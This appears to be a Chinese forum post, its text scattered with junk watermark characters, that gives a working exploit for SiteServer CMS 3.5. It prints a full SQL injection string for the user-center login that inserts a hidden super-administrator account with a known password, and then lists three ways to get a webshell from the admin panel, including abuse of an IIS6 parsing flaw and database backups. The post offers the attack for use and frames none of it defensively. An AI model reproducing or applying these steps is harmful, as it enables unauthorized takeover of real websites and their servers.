经测试秒杀最新的3.5版4 [! C' T. @: K$ C( p5 L
0 c- k# _$ ~& W
stieserver官网:www.siteserver.cn
2 H( |* `: @& _+ q, S
9 E& A7 Y) P+ Y% @" \; ` 9 f% c" \( P/ I& B" F
1 ~% F* y' Z- N4 |EXP:- B4 L- w& F5 i
% j4 q7 N# O8 |5 F$ o直接访问UserCenter/login.aspx7 _; o+ A# ?6 r$ p8 N
# G3 t) z( f. n+ H
/ a* ]' ?# g& x: [6 j" d6 J, Q8 }
! M9 p+ J! U% I+ f4 @ k% o' \: d
用户名处输入:3 _* W5 a0 H" r4 T$ x# o- p
, S. v! O. p A% k! H3 P* E. @7 O123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
3 i3 x( h# j( l3 L$ `& [- P, k5 W" v8 r) y3 z
; ^ a& r& F+ i1 U9 _- T4 o& T0 ]! e
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
( D# Z9 x2 P1 \6 |* n+ H( |. ~, [$ r5 Y2 x! b" @) X
- X; a0 f D" i o5 P5 M8 F2 m# a, W1 R1 G: I4 L
之后再访问后台SiteServer/login.aspx用插入的用户登陆& i/ M: L% a" i$ d$ h; w
4 X L2 U. ?) ]1 [4 N ' `4 }8 y* Q2 `" D* R
) ]+ n$ v7 @+ k5 \# T0 p后台拿webshell的三种方法:. r2 s# m6 O7 J: P% U( z; D
/ ~. r8 J0 w3 ] I( y9 D$ k一、
' \8 A$ y4 {5 r( ]( A- ?
0 v+ A6 g$ x% A$ u" }站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
- T4 D7 A1 V3 y4 t7 k1 L+ _5 ?0 m9 p
二、
0 [6 S7 Q5 l' ]: G) |
9 E p" f# b8 X- K' K2 _- o成员权限-》添加用户-》用户名为:1.asp
; _; \8 U' k1 ?3 ^) t# g6 ?0 j N$ w: B1 B
http://127.0.0.1/usercenter/
' e2 v' y2 l4 ~* G _+ z9 o" M' C& G; |# s' N+ I2 E
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
3 q X* z; m: m: S' A) @# e2 r8 C; F9 |& p8 N% J& k# x
(ps:后台添加用户时不会验证是否含有非法字符)) K, U5 X0 D0 Q8 o+ |
1 M" E( |: t$ c) h0 r3 V三、
, ?4 p# G, Z) ?/ h: _, m' w
; F) Y0 C) W$ t) Q5 w8 j系统工具-》实用工具-》机器参数查看
8 w) U$ O; n. h9 E& g7 A可以看到数据库类型、名称,WEB路径/ X( k9 x* B9 g) o [: T) w
! M4 C8 E! K! c, ]系统工具-》数据库工具-》SQL语句查询
% ?$ H. ]& B: ]# r" v这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
4 J; t7 q+ \; S: {/ _3 p# H( E1 u& B3 L+ z! r8 i) Z
|